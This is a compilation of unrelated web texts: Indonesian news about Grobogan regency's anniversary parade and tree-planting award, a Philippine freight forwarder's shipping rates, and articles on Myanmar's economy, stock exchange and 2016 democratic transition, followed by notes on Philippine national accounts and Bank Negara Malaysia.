Rangkaian peringatan hari jadi atau HUT ke 287 Kabupaten Grobogan dimeriahkan dengan kirab budaya, di alun-alun Purwodadi. Kirab budaya tersebut, diikuti oleh seluruh SKPD, pelajar Kabupaten Grobogan dengan menampilkan berbagai seni daerah. Seperti tokoh pewayangan, Mahabarata, Ramayana, Asrah Batin dan yang lainya.

GROBOGAN – Rangkaian peringatan hari jadi atau HUT ke 287 Kabupaten Grobogan dimeriahkan dengan kirab budaya, di alun-alun Purwodadi, Sabtu sore (2/3). Kirab budaya tersebut, diikuti oleh seluruh SKPD, pelajar Kabupaten Grobogan dengan menampilkan berbagai seni daerah. Seperti tokoh pewayangan, Mahabarata, Ramayana, Asrah Batin dan yang lainya.

Kirab dibuka oleh Bupati Grobogan Bambang Pudjiono di alun-alun Purwodadi Jalan Gatot Subroto. Kemudian memutar di Jalan DI Panjaitan, Jalan Siswa – Jalan R Soeprapto dan kembali lagi ke alun-alun Purwodadi. Ribuan warga antusias mengikuti dan melihat kirab budaya dalam peringatan hari jadi Kabupaten Grobogan.

Ketua panitia kirab Arifin mengatakan, kirab budaya ini diikuti oleh 20 kelompok dengan menampilkan berbagai kesenian dan baju daerah. Selain itu, acara tersebut juga diikuti oleh ratusan pelajar dari SD dengan sepeda hias. ”Acara ini merupakan wujud syukur kepada Tuhan atas segala nikmat dan anugerah yang telah diberikan selama ini,” kata pria yang juga menjabat sebagai Camat Kota Purwodadi.

Dia menambahkan, dalam kegiatan ini semua SKPD menggunakan pakaian daerah dan menunjukkan kreasi budaya dihadapan ribuan masyarakat. Kirab budaya juga untuk menunjukkan unggulan dan menjadikan daya tarik pariwisata di Kabupaten Grobogan.

”Kirab budaya tahun ini lebih menarik dibandingkan dengan tahun sebelumnya. Disebabkan semua pelajar, guru seni, seniman rakyat dan para komunitas di Kabupaten Grobogan ikut memeriahkanya,” terang dia.

Selain itu, dalam kegiatan juga diikuti oleh tokoh pewayangan, gunungan, kesenian ketoprak dan kesenian daerah lainya yang menyedot perhatian warga. Menurutnya kegiatan ini bertujuan untuk menumbuhkan rasa cinta sekaligus mengenalkan budaya daerah kepada masyarakat. Dimana kebudayaan tersebut harus dijaga dan diuri-uri untuk kelestarian budaya daerah.

”Kirab budaya ini, menjadi agenda rutin setiap tahun sebagai bentuk pengenalan budaya dan memberikan hiburan kepada masyarakat di hari jadi,” tandasnya.**

Mungkin kita tidak asing dengan nama BING. Ya, benar, itu adalah salah satu searc engine, seperti google.

Kali ini BING mencoba suatu terobosan yang baru, guna agar dapat bersaing dengan serch engine terpopuler yaitu Google.

Banyak diantara kita yang ingin mengetahui kedalaman laut tapi dengan berbagai hal tak semua orang mampu melakukan penyelaman yang ekstrem. Kini ada solusinya, aplikasi pemetaan yang dikembangkan Microsoft, Bing Maps, memungkinkan anda mengetahui kedalaman laut tanpa harus menceburkan diri kelautan biru. Bing Maps baru saja memperbarui platform Maps berkat citra satelit TerraColor, dengan resolusi 15 meter per piksel serta citra satelit resolusi tinggi yang mencakup 13,79 juta kilometer persegi. Cakupan ini diklaim meliputi seluruh wilayah dunia.

Seperti dilansir Mashable, JUmat (1/3), Microsoft mengatakan langkah ini adalah bagian dari upaya Bing untuk menyaingi Google Maps yang telah memperkenalkan layanan StreetView. Layanan StreetView dalam Google Maps memungkinkan pengguna melihat suatu lokasi dari berbagai sudut alias 360 derajat.

Data pemetaan baru ini menunjukkan bentuk dan keistimewaan alami Bumi, menampilkan lapisan dasar lautan dengan meminimalisir tampilan awan melayang di suatu wilayah. Dengan demikian pulau-pulau kecil dapat dilihat dengan jelas. Pengguna juga bisa mengetahui kedalamn laut berdasarkan warna. Selain itu pengguna dapat pula memperbesar peta sampai 13 kali untuk mendapatkan rincian lebih detail melalui pencitraan satelit tersebut. (KF-EDU/Vey/Viva)

Ada 3 hal dalam hidup yang tidak akan kembali : 1. Waktu 2. Kata-kata 3. Kesempatan.

Ada 3 hal yang dapat menghancurkan hidup seseorang : 1. Kemarahan 2. Keangkuhan 3. Dendam.

Ada 3 hal yang tidak boleh hilang : 1. Harapan 2. Keikhlasan 3. Kejujuran.

Ada 3 hal yang paling berharga : 1. Kasih Sayang 2. Cinta 3. Kebaikan.

Ada 3 hal dalam hidup yang tidak pernah pasti : 1. Kekayaan 2. Kejayaan 3. Mimpi.

Ada 3 hal yang membentuk watak seseorang : 1. Komitmen 2. Ketulusan 3. Kerja keras.

Ada 3 hal yang membuat kita sukses : 1. Tekad 2. Kemauan 3. Fokus.

Ada 3 hal yang tidak pernah kita tahu : 1. Rezeki 2. Umur 3. Jodoh.

Tapi, ada 3 hal dalam hidup yang pasti, yaitu : 1. Tua 2. Sakit 3. Kematian.

Dalam keadaan bumi yang kini, yang kian hari kian makin memanas karena global warming atau pemanasan Global, dimana Grobogan meraih juara terbaik nasional.

untuk selengkapnya, baca artikel berikut.

GROBOGAN – Setelah meraih juara di tingkat provinsi Jawa Tengah, Kabupaten Grobogan kembali meraih juara tingkat nasional dalam bidang penghijauan yakni sebagai juara program One Billion Indonesian Trees (OBIT ). Penghargaan gerakan penanaman satu miliar pohon tersebut diterima oleh Bupati Grobogan, H. Bambang Pudjiono, SH dari Presiden Susilo Bambang Yudhoyono di Kawasan Hutan Kota Cengkareng (28/11).

Bupati Grobogan, H. Bambang Pudjiono, SH usai menerima penghargaan mengungkapkan keberhasilan tersebut merupakan hasil jerih payah semua pihak baik kalangan PNS, anggota Dewan, TNI. POLRI. Masyarakat, Ormas, sekolah maupun pelajar, organisasi wanita dan yang lainnya.

“ Keberhasilan ini yang pasti hasil jerih payah semua pihak. Bukan hanya saja oleh masyarakat sekitar hutan maupun pihak perhutani tetapi juga dari elemen lain yang mendukung. Ada TNI, POLRI, LSM, Organisasi Wanita, pelajar, pramuka dan sebagainya. Dan tentunya kita bangga sebagai juara Nasional program OBIT . “ tandasnya .

Disinggung Staregi kebijakan Pemerintah Kabupaten Grobogan untuk mencapai target penanaman 1 M pohon th 2012, orang nomor satu di Grobogan menjelaskan dengan melakukan penguatan kelembagaan pelaksana OBIT dan Pembentukan POKJA.

& # 8221; S trategi kita adalah dengan pembentukan POKJA dan penguatan kelembagaan pelaksana OBIT secara lintas sektor ditingkat Kabupaten Grobogan. Kemudian mensinergiskan program / kegiatan dan mobilitasi sumber daya baik itu pendanaan, organisasi sos / ek/ keagamaan / pol dan organisasi non Pemerintah untuk mensukseskan gerakan OBIT. Dan terakhir, menyelenggarakan lomba dan pemberian penghargaan kepada para pihak yang peduli penghijauan . & # 8221; jelasnya .

Terpisah, Sekretaris Dinas Kehutanan dan Perkebunan Grobogan, Isti Harini menambahkan, pelaksanaan lomba OBIT bertujuan menilai kepedulian Pemkab beserta jajarannya terhadap penghijauan di daerahnya. Sedangkan sasaran lokasi penanamannya di kawasan hutan konservasi, hutan lindung dan kawasan produksi yang sudah rusak maupun ditempat-tempat yang kurang produktif.

& # 8221; Yang pasti sasaranya adalah didalam kawasan hutan konservasi, maupun ditempat lainya. Guna mendukung itu terutama dalam penyiapan pembibitan kami sudah melakukan pembentukan kelompok pembibitan sebanyak 122 kelompok yang kami bentuk sejak tahun 2010 hingga tahun 2012. Dan Gerakan penanaman satu Milyar pohon tahun 2011 merupakan kelanjutan gerakan penanaman satu milyar pohon pada tahun 2010 dengan target sebanyak 4.320.000 pohon. Untuk Penanaman di kawasan hutan sebanyak 5.271.625 batang pohon serta kegiatan penghijauan lingkungan bersama masyarakat sebanyak 897.660 batang pohon “ jelasnya usai mengikuti Upacara Bendera HUT Korpri (29/11).

Seperti diberitakan, Kabupaten Grobogan tahun 2004 juga pernah meraih juara I Nasional Pelaksanaan Gerakan Nasional Rehabilitasi Hutan dan Lahan (GNRHL). Tahun 2005 Kabupaten Grobogan juga meraih Juara I nasional pelaksanaan GN-RHL untuk kinerja kelompok tani dan tahun 2007 juara Nasional penyuluh kehutanan teladan.

Sumber. & # 8211; ppid. grobogan. go. id

Mensaje de navegación

Import / Export Shipment

Manila Forwarder Phil, Inc handles both in-bound and out-bound shipments of commercial goods and household effects. We offer Full Container Loads and Less Than Container Loads. We ship WORLDWIDE. However, in destinations other than USA, the shipper and or the recipient or consignee is responsible in clearing their shipment, and pay other possible destination charges from the receiving agent. You will be responsible in clearing the shipment yourself or hire a local customs broker in that area.

The company also offers balikbayan box services from the Philippines to any point in the United States for As low as $175 plus other fees per standard balikbayan box. Please see details HERE .

For small shipments, We recommend using our air cargo services .

The company also acts a US Purchasing representatives for various Philippine-based businesses. You may email us to set-up your account . Manila Forwarders could identify the supplier for your requirements and arrange your orders. We can also handle payments via paypal.

Commercial and Household good shipments fall under different categories in import / export shipments. Please visit US Customs Service Website or the Customs authorities of your shipments destination.

Balikbayan Box Shipments from Philippines to United States

Balikbayan box shipments from Philippines to Northridge, CA and other parts of USA. Average delivery time is 45-70 days. US Customs inspection time frame varies. Do not use this method if your shipment is time essential as we do not guarantee the delivery turn around because of the variable inspection time by the US Homeland Security.

This service is limited to US Citizens and legal US immigrants who have lived in the Philippines prior to residing in the United States are allowed by the United States Government to ship their personal belongings to the US. This is just a one time privilege. Complete documentation is required. Misdeclaration or misrepresentation is a criminal offense,

& Middot; Empty Balikbayan Box $5/box - Regular box size 24"x18"x18", 4.5 cubic feet, heavy duty - Jumbo box size 24"x18"x24", 6.0 cubic feet, heavy duty · Pickup Fee $10 Metro-Manila, $20 All of Luzon, $30 Visayas and Mindanao

& Middot; Ocean Freight, Manila to Northridge, CA 91324 Rate - Regular box $175 per box (18x24x18") - Jumbo box $200 per box (24x18x24") · Pick up at Northridge CA Office only. & Middot; Rates for deliveries other than Northridge pls. haga clic aquí

Higher rates for over 70 lbs. Click the link below: UPS Ground Service

IMPORTANT NOTE: Quote is subject to change without prior notice. Customs Inspection Charges, Duties and Taxes is the responsibility of the Shipper for Taxable items. Random US Homeland Security inspection expenses is the responsibility of the shipper. Non-payment of such charges, as determined in the USA may result in non-deliverey of shipments. There is no implied promise of delivery time as US Customs inspection time frame varies. This quote is for Personal Goods Only which are non-taxable*

Companies licensed to do business in the Philippines and/or United States are allowed to do foreign trade. Requirements for such varies depending on the articles being shipped. The requirements are not limited to the ff: Requirements:

Philippine Charges: · Ocean Freight $100 per cubic meter ( CBM ) · Automated Manifest System ( AMS) Fee $ $50 · Bill of Lading Fee $100 per BL · LCL Fee / Arrastre Wharfage $12 per CBM · All-In Ex-works charges $150/ LCL shipment · Trucking / Pick up Charge $ 40 per trip within Metro-Manila, add more for provincial sorties

If commodity in wooden pallet:

& Middot; please add Fumigation Fee $60 for 1-5 CBM/ $75 over 5 CBM · Phytosanitary $75 per LCL Shipment Crating Services, Manila: $75 per CBM Maritime Insurance $1.50 / $100 coverage

US Charges: · Consumption Entry Fee $150 per shipment plus Classification Fee 1 line free, additional $6 per line Additional Invoice $10 per additioanal invoice Single transaction Bond per Entry minimum of $60 or $5 per $1,000 FDA Clearance Fee $40 Fish & Wildlife Clearance $40 Fish & Wildlife Fee to the Goverment Standard Rate $87 Continious Bond ( $50,000 ) $600 Actula Duty based on Entry Summary · Forklift Fee $ 200 per CBM · Documentation $50 per shipment · Handling Fee $100 per shipment · Domestic Trucking to any point in the USA. Click the link below:

Quote is subject to change without prior notice. All shipment is subject to thorough inspection of Manila Forwarder prior to shipment.

US Homeland Security Inspection conducts random examination. Inspection Fees, Duties and Taxes is the responsibility of shipper. Inspection Charges varies based on the type of inspection conducted by US Customs*

Please email us for details. Manila Forwarder Phil, Inc Philippine Export Office

Shipment from Philippines to other countries (Port to Port)

Manila Forwarder provides shipping services from the Philippines to any countries worldwide, port to port. In this term of shipment, consignee will be the one to clear his package from customs custody and pay for the additional charges once the box arrived in the importing country.

Balikbayan box shipment: This service is limited to citizens or immigrants of the importing country, who have stayed in the Philippines for at least 6 months prior to residing in the importing country. Shipper and consignee should be same person and one time privilege only.

Documentary Requirements for Philippines customs filing

& Middot; Signed packing list · Passport copy · Copy of SSS ID (for Canada shipment)

Documentary requirements and procedure for importing country’s customs filing · it varies depending on the customs government of the importing country

Commercial Shipment This service is not limited to Less Container Load (per box) only but to Full Container Load as well.

Documentary Requirements for Philippines customs filing

& Middot; Signed and detailed packing list · Signed commercial invoice · Copy of BIR registration · Business Permit · Importer’s Security Filing Form · For regulated commodities, export clearance issued by the regulating government agency must be acquired.

Food and food products BFAD

& Middot; Coffee BFAR · Sugar and Molasses SRA · Grains and grains by=product NFA · And other commodities under CB Circular 1389

Please email us for details.

Manila Forwarder Phil, Inc 0152 M. H. Del Pilar Street corner Decena Street, Arkong Bato, Valenzuela City, Metro Manila, Philippines 1444 click on the address to see map. TelFax: +011.632.921.7924 Tel: +011.632.579.4556 Tel: +011.632.579.4557 manilaoffice@manilaforwarder. com

If you are not on a rush and you understand that there might be other fees that you need to pay at the destination, GET YOUR QUOTE HERE


CBM 2012 to highlight activities for MSMEs

CEBU, Philippines - In its thrust to attain the highest achievement for the province’s entrepreneurial sector, Cebu Business Month 2012 highlights the micro, small and medium enterprises towards growth, profitability and long-term sustainability.

As the overall chairman of CBM 2012 Committee, Cebu Chamber of Commerce and Industry Trustee Mario Panganiban said that there are a number of events laid out for the benefit of the MSME sector, considering that they are major contributors of economic growth.

With its goal to improve MSMEs competitiveness through big-brother-small-brother mentoring and coaching, a sofa session will be held on June 8 at City Sports Club with the MSME Development Councils of Region 7 while successful MSMEs would share how they incorporated global themes in their business strategies.

He also said that more activities are in store for MSMEs as there would be a seminar with Cebu Bankers Club focusing on SME Financing and Cash Management on June 13 at Bangko Sentral ng Pilipinas and Financial Executives of the Philippines Seminars on Managing Business Risks and Managing Cost on June 14.

Meanwhile, as the MSME sector faces struggle in accessing financial loans, Filipino Cebuano Business Club Chairman Rey Calooy said that CBM 2012 programs will help entrepreneurs in acquiring new business strategies.

“We are very happy of that development because it really reaffirms our core advocacy in FILCEB that MSME should be at the center of every economic development roadmap. Since we founded FILCEB, our main advocacy is to help these MSMEs attain their highest potentials,” he stated.

Freeman ( Article MRec ), pagematch: 1, sectionmatch:

With almost 200 member companies, he added that FILCEB members are very eager to attend the seminars on financial management and majority of them may commit their full participation in this year’s CBM.

Serving as one of the resource speakers during last year’s business month, Calooy noted that entrepreneurs should embody creativity, get closer to customers and simplify the speed of services for them to survive in today’s global complexity of the business arena.

With a total of 18 activities, the month-long celebration of CCCI intends to promote the Queen City of the South as an ideal economic and industrial hub in the country through its productivity and profitability. (FREEMAN)

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Myanmar Business and Investment Digest—October 2015

A domestic perspective of news from the past month with implications for business and investment in Myanmar.

Politics: Run up to the election on 8th November; Military and political committees being formed after signing of nationwide ceasefire

Economics: Global Witness report on the jade industry; Central bank rationalizes FX licences; Launch of new online statistics portal

Business: Koreans may partner with Capital Diamond Star on a $620mn Yangon Urban Expressway; Thailand’s Bumrungrad Hospital to set up clinic in Yangon; Siam Makro looking at feasibility of entering Myanmar


Run up to the election on 8th November

The election campaign continues and the outcome remains as unclear as it did last month. We will be posting some comments to the website when the results are known. In the meantime, please use the following link to read an overview provided by the BBC’s Jonah Fisher: http://www. bbc. co. uk/news/world-asia-33547036

Military and political committees being formed after signing of nationwide ceasefire According to the Myanmar Times, representatives of the two sides that are party to the agreement have been nominated; independent “well-respected individuals” will join them later.

The joint committees will be responsible for drafting a military code of conduct and a framework for political dialogue between the signatory ethnic groups, the government and other political parties. Seats on the committees are to be kept open for other groups that sign the ceasefire later. http://www. mmtimes. com/index. php/national-news/nay-pyi-taw/17083-after-nationwide-ceasefire-signing-military-political-committees-formed. html


Global Witness report on the jade industry

In a new report, Global Witness—an NGO that investigates the links between the extraction of natural resources and corruption, conflict and environmental destruction—has argued that Myanmar’s jade industry in 2014 could have been worth as much as $31bn and that it remains as connected to illicit “networks of military elites, drug lords and crony companies” as it ever was.

According to the NGO, $31bn equates to nearly half Myanmar’s annual output and four times the national healthcare budget.

Crony companies specifically mentioned in the report include the well-known Asia World and the Htoo groups (both subject to US sanctions) and the less familiar Ever Winner group, which Global Witness says is linked to the promoters of the KBZ Group and Skynet satellite TV.

Central Bank rationalises FX licences

In a move that it says is aimed at increasing the use of the Kyat in the domestic economy, the Central Bank of Myanmar is cancelling FX licences that had previous been granted to a variety of businesses, including hotels. Companies other than banks and money-changers (and including MEHL, a conglomerate controlled by the military) are being required to return their licences by the end of November.

Individuals may continue to hold up to USD 10,000 in cash without having to deposit it with a bank and there has been no change in policy on the transfer of Dollars in business transactions or remittances. Businesses that display their prices in Dollars, however, should convert these into local currency and receive their payment in Kyat.

A notice on the new rules has been posted to the central bank’s website. A Myanmar Times summary report is attached via the following link: http://www. mmtimes. com/index. php/business/17053-hundreds-of-forex-licences-revoked. html

Launch of new online statistics portal (MMSIS)

A new online statistics database, the Myanmar Statistical Information Service (MMSIS) has been launched under the auspices of the Central Statistical Organisation and with the assistance of the Korea International Cooperation Agency (KOICA).

The database “is designed to respond to the growing demand for data that describe socio-economic conditions in Myanmar, at national and subnational levels”. The supporting data is currently supplied by the CSO, agencies comprising the Myanmar National Statistics System (NSS), as well as the private sector.

Please use the following link to access the MMSIS website: http://mmsis. gov. mm/


Koreans may partner with Capital Diamond Star on a $620mn Yangon Urban Expressway in two phases

DealStreetAsia has reported that Korea’s Lotte E&C and Halla Corp. are exploring a JV public-private partnership to develop a 20km elevated highway connecting central Yangon with the Mingaladon Industrial Park. A second phase is being considered to link the expressway with the new Hantharwaddy international airport near Bago. Korea Expressway Corp would be an operator of the project and the government would contribute 20% of the cost. http://www. dealstreetasia. com/stories/s-korean-majors-lotte-halla-corp-to-partner-myanmars-capital-diamond-for-620m-urban-expressway-17511/

DealStreetAsia has also indicated that construction of a $130mn bridge across the Yangon River to Dala township (which, roughly, faces the southernmost part of the city) could start by the end of 2015. The bridge is scheduled to take five years to complete.

Thailand’s Bumrungrad’s Hospital to set up clinic in Yangon

The Bangkok Post has reported that Bumrungrad Hospital has received MIC approval to operate a private clinic and diagnostic services in Myanmar. Bumrungrad will own 80% of the venture and its partner, Yangon International Medical Services, 20%. It expects the facility to be operational from the middle of 2016. http://www. bangkokpost. com/news/general/750056/bumrungrad-wins-deal-to-build-clinic-in-yangon

Siam Makro looking at feasibility of entering Myanmar

The Bangkok Post has also reported that Siam Makro, a subsidiary of the Charoen Pokphand Group that operates cash-and-carry stores, is conducting a feasibility study on market opportunities in ASEAN, with Vietnam, Indonesia and Myanmar “being the priority destinations”. http://www. bangkokpost. com/news/asean/748424/siam-makro-eager-to-open-first-store-in-myanmar

Last modified: 12 November 2015

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Myanmar to Open Stock Market, Analysts' Concerns Dominant

Myanmar will launch its new stock exchange on Wednesday, opening the door to the world after more than three decades under military rule.

Yangon - Myanmar, earlier known as Burma, is ready to launch its new stock exchange on Wednesday, with a goal to encourage stronger inflows of foreign money to the country.

The official name of Myanmar's stock market is the Yangon Stock Exchange (YSX). Headquartered in Myanmar's former capital city Yangon, it boasts a $24 million investment by Myanmar Economic Bank, Daiwa Securities and Japan Exchange Group.

International companies like Coca-Cola, Telenor, Colgate Palmolive and Mitsubishi had already started investing in Myanmar after the lifting of Western sanctions in 2013.

Foreign direct investment in Myanmar reached the historical level of $8 billion during the last fiscal year, with most companies expecting an economic and consumer boost in the coming years.

Myanmar's government decided to broadly open the door to its economy after November's parliamentary elections - the first free and democratic vote - claimed a victory for the National League for Democracy candidate.

Yet, analysts agreed that this will not be enough for Myanmar, if all rules for the new stock market are not clear and transparent.

"The opening of the YSX is not going to be a giant leap forward, it's just a small step in the right direction. For stock markets to play a role in the economy, rules and regulations need to be put into place. Several areas in Myanmar still remain nebulus, there aren't any rules on disclosures, shareholder voting or annual general meetings," Adam Jarczyk, Asia Pacific practice leader at consulting firm Frontier Strategy Group said.

Even though the YSX is seen as Myanmar's government signaling a different market approach, many analysts have concerns that the YSX could end up like its neighbors, with very low liquidity. The Cambodian Stock Exchange and Laos Securities Exchange have only two and four listed companies, respectively, and remain outside of the investing plans of many companies.

Tough standards for listing on the YSX magnify worries about low liquidity. Two years of profits, demonstrated tax compliance and at least one hundred shareholders are required for an IPO. A company that can jump through those hoops might not need to raise capital.

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1996 to present

The current PSNA basically follows the 1968 UN System National Account (SNA) but to a limited scale incorporates the recommendations of the 1993 SNA.

Transactors are economic units called institutional units. В The institutional sectors in the present PSNA are.

Private Corporations

Government Corporations

General Government; y

Households, including non-profit institutions serving households and unincorporated enterprises.

Economic Territory does not coincide exactly with geographic territory

Total economy consists of all institutional units that are residents of the country

An institutional unit is said to be resident of a country when it has a center of economic interest in the economic territory of country - that is when it engages for an extended period (one year or more being taken as a practical guide) in economic activities of this territory.

Current PSNA / 1993 PSNA

Salient Features of the 1993 SNA

With more articulations introduced in the classifications and institutional sectoring, compilers and users have more flexibility in prioritizing various parts of the accounts, depending on the analysis required and data availability.

Harmonized with other international statistical systems such as the Balance of Payment (BOP), International Labour Organization (ILO), Government Finance Statistics (GFS), and Money and Banking Statistics (MBS)

More articulated accounts to address concerns such as the revaluation account that record changes in prices or inflation

Introduce the concept of Gross Domestic Income and the concept of Gross National Income (GNI) to replace Gross National Product (GNP). GNI (at constant prices) is equal to GDP (at constant prices) plus Trading Gains/Loss from changes in the terms of trade plus NFIA (at constant prices)

Introduce the concepts of mixed income and primary income

Delineation of output into market output, output for own final use and non-market output.

Provision of guidelines for the compilation of satellite accounts such as environmental, tourism, education and transportation accounts.

Comparison of the 1993 SNA and the Current PSNA


a. financial b. non-financial c. general government d. households e. non-profit institution serving households.

a. private corporations b. government corporations c. general government d. households including NPISHs and unincorpotated enterprises.

Accumulation Account 1. Capital Account 2. Financial Account 3. Other Changes in Volume of Assets Account 4. Revaluation

Only the capital account for the whole economy is covered. A matrix presentation of the financial account (Flow of Funds) is being compiled by the BSP.

Mixed Income for unincorporated enterprises owned by households - remuneration for work done by the owner ofВ the enterprise as well as a return to entrepreneurship

No distinction between operating surplus and mixed income

New democratic era dawning in Myanmar

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In this Jan. 4, 2016 photo, leader of the National League for Democracy party (NLD) Aung San Suu Kyi, center seated, surrounded by NLD lawmakers, attends a ceremony to mark Myanmar's 68th anniversary of Independence in Yangon, Myanmar. Led by a triumphant Aung San Suu Kyi, Myanmar is preparing to take a historic leap into uncharted territory, having only known democracy for 14 of its 1,000 years of recorded history. Suu Kyi, who scored a stunning victory in last year’s elections, follows a procession of absolute monarchs, British colonial rulers and home-bred generals who are still standing tall in the wings. (AP Photo/Gemunu Amarasinghe)

In this Nov. 1, 2015 photo, supporters of Myanmar's pro-democracy icon Aung San Suu Kyi, far end on the stage, wave flags of Suu Kyi's National League for Democracy party during a campaign rally, Yangon, Myanmar. The new era dawns April 1, 2016 when Suu Kyi’s National League for Democracy, which captured nearly 80 percent of the contested parliamentary seats, takes over power from a military-dominated regime and attempts to shed decades of political oppression, civil war and economic ruin in this resource-blessed Southeast Asian nation once hailed as the continent’s rising star. (AP Photo/Gemunu Amarasinghe)

In this Nov. 1, 2015 photo, Myanmar's pro-democracy icon Aung San Suu Kyi delivers a speech as party patron Tin Oo, left, watches during a campaign rally of Suu Kyi's National League for Democracy party in Yangon, Myanmar. Led by a triumphant Aung San Suu Kyi, Myanmar is preparing to take a historic leap into uncharted territory, having only known democracy for 14 of its 1,000 years of recorded history. Suu Kyi, who scored a stunning victory in last year’s elections, follows a procession of absolute monarchs, British colonial rulers and home-bred generals who are still standing tall in the wings. (AP Photo/Gemunu Amarasinghe)

In this Sept. 11, 2015, supporters of Myanmar's pro-democracy icon Aung San Suu Kyi, background in a poster await to welcome Suu Kyi ahead of a campaign rally of her National League for Democracy party in Hpasawng, Eastern Kayah State. Led by a triumphant Aung San Suu Kyi, Myanmar is preparing to take a historic leap into uncharted territory, having only known democracy for 14 of its 1,000 years of recorded history. Suu Kyi, who scored a stunning victory in last year’s elections, follows a procession of absolute monarchs, British colonial rulers and home-bred generals who are still standing tall in the wings. (AP Photo/Gemunu Amarasinghe)

In this Dec.13, 2015 photo, leader of National League for Democracy party (NLD) Aung San Suu Kyi, right in white top, points at garbage during a cleanup drive initiate by Suu Kyi in Kawhmu, south of Yangon. Led by a triumphant Aung San Suu Kyi, Myanmar is preparing to take a historic leap into uncharted territory, having only known democracy for 14 of its 1,000 years of recorded history. Suu Kyi, who scored a stunning victory in last year’s elections, follows a procession of absolute monarchs, British colonial rulers and home-bred generals who are still standing tall in the wings. (AP Photo/ Gemunu Amarasinghe)

NAYPYITAW, Myanmar (AP) — Led by a triumphant Aung San Suu Kyi, Myanmar is preparing to take a historic leap into uncharted territory, having only known democracy for 14 of its 1,000 years of recorded history. Suu Kyi, who scored a stunning victory in last year's elections, follows a procession of absolute monarchs, British colonial rulers and home-bred generals who are still standing tall in the wings.

The new era dawns April 1, when Suu Kyi's National League for Democracy, which captured nearly 80 percent of the contested parliamentary seats, takes over power from a military-dominated regime and attempts to shed decades of political oppression, civil war and economic ruin in this resource-blessed Southeast Asian nation once hailed as the continent's rising star.

What happens next is being touted as "a political and economic renaissance" or, as one local editorial predicted, "Myanmar's best year yet." But others fear the victors, having spent much of their lives as opposition activists and prisoners rather than in government, may, as the Burmese proverb goes, simply be "overwhelmed by 16,000 problems."

Among them, the NLD faces the world's longest running insurgency by Myanmar's ethnic minorities with tens of thousands still under arms and deeply distrustful of the central government and a military that will continue to control the country's civil administration, three key ministries, 25 percent of the seats in Parliament and economic holdings amassed during its half-century in power.

"The NLD victory is just one step in Myanmar's democratic process, not a major turning point," said Yan Myo Thein, a veteran analyst and former political prisoner.

Adding to its woes, Myanmar falls among the world's poorest countries with abysmal education and health systems and is burdened with pervasive corruption. It ranks 147 among 168 countries on Transparency International's latest global corruption index.

The new government will also have to re-order its relationship with China, formerly a staunch supporter of the generals, deciding how far it can risk alienating its powerful neighbor by veering toward the United States and Europe and curbing ravages Chinese companies are inflicting on Myanmar's environment.

The team to tackle such a spectrum of problems is currently being shaped under tight wraps in this surreal, military-built capital hacked out of the jungle. Suu Kyi recently announced that only she among her party members could speak to the press, but not before her spokesman Nyan Win said the team-building was proving difficult.

"It's going to be tough for anybody to run that place. The expectations are likely to be too great for her to succeed in the way people want," says David Steinberg, an American scholar who has tracked Myanmar since the 1950s.

The 70-year-old Suu Kyi is barred from leading the country, although the Nobel Prize laureate has made it clear that she will be "above the president," calling the shots. By the constitution the president, to be selected this month, cannot like Suu Kyi have been married to a foreigner or have children of foreign citizenship.

Some of her behavior has raised questions about Suu Kyi's leadership, with some NLD members calling her a "democratic dictator" who has surrounded herself with a generally sycophantic inner circle. In the 28 years since the party was founded, only one other figure of national stature has emerged: Tin Oo, a former armed forces commander turned democracy champion. But he is now 88.

"The NLD is not a democratic party. It's her view on what is going to prevail that's important," says Steinberg. "There is nobody of stature within the NLD who has the experience to run things. She has kept down a generation of leadership within the party."

Still, after decades of military rule, the political transition seems to be going relatively well, said Richard Horsey, an adviser to the think tank International Crisis Group, noting in particular Suu Kyi's crucial meetings with armed forces chief Gen. Min Aung Hlaing and former junta leader Than Shwe, who is widely believed to still advise the military on critical decisions.

The meetings appeared to be efforts to formulate a future working relationship with the military that will require of Suu Kyi an ingenious tightrope act: forging ahead with her democratization agenda while not overly infringing on the military's power and pride lest this ignites a backlash and plunge the country into its militaristic past.

The most optimistic scenario, Horsey says, would have the military "rehabilitate itself into a standard, modern army, and to be seen as protecting the realm rather than a source of domestic oppression. They will need the NLD for that."

Another possibility sees parallel government and economic structures emerging, with the military ignoring the government when it so chooses.

"You must remember that the military is autonomous. They will not take orders from the president, only from their commander-in-chief," says Bertil Lintner, author of several books on Myanmar including a biography of Suu Kyi.

The Home Ministry, headed by a military-appointed minister, will retain its power over civil administration down to the village level as well as the police and domestic espionage. From its business conglomerates, the Union of Myanmar Economic Holdings and Myanmar Economic Corporation, it will be able to draw funds well beyond those it is allocated under government budgets.

Given that the technocratic elite is mostly comprised of retired or serving military officers, Suu Kyi will have little choice but retain many. But Yan Myo Thein and others say Suu Kyi may go too far, including more than the mandated number of military in her Cabinet as well as at least one member of the military-backed party she trounced in the elections.

"I worry that she may rely too much on the military. She is always trying to compromise with them, and they hold the upper hand," said Yan Myo Thein, who has close contacts with NLD members. "I am not certain whether the cooperation between the NLD and the military will be beneficial for our country."

This would certainly alienate the many with deep-seated hatred of the military, especially the ethnic minorities who have suffered brutal army campaigns against them and are hoping the new government will move toward a federal system allowing more autonomy and end warfare that has plagued the country since independence from Britain in 1948.

Hopeful too are Rohingya Muslims in Rakhine State, where hundreds have been killed and 140,000 driven from their homes in communal violence.

Talk to ordinary citizens, and many will describe Suu Kyi in almost saintly terms although others say they voted not so much for her but rather to get rid of the detested military.

"I used to like her a lot but she is now behaving very differently from the past. I don't know what to expect from her. She used to be humbler. She behaves more like a hierarchical figure now," said Maung Maung a 46-year-old security guard. "We will wait and see how she will lead the country."

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Bank Negara Malaysia

BNM headquarters in Kuala Lumpur.

Bank Negara Malaysia ( BNM ; literally National Bank of Malaysia . officially Central Bank of Malaysia ) is the Malaysian central bank. Established on 26 January 1959 as the Bank Negara Malaya . its main purpose is to issue currency, act as banker and adviser to the Government of Malaysia and regulate the country's financial institutions, credit system and monetary policy. Its headquarters is located in Kuala Lumpur. the federal capital of Malaysia .

The bank is active in developing financial inclusion policy and is an important member of the Alliance for Financial Inclusion. [1]

The institution co-hosted the AFI Global Policy Forum (GPF) [ 2 ] in 2013 in Kuala Lumpur, Malaysia.



In 1837 the Indian rupee was made the sole official currency in the Straits Settlements. but in 1867 silver dollars were again legal tender. In 1903 the Straits dollar. pegged at two shillings and fourpence (2s. 4d.), was introduced by the Board of Commissioners of Currency and private banks were prevented from issuing notes. Since then, the continuity of the currency has been broken twice, first by the Japanese occupation 1942 – 1945, and again by the devaluation of the Pound Sterling in 1967 when notes of the Board of Commissioners of Currency of Malaya and British Borneo lost 15% of their value.

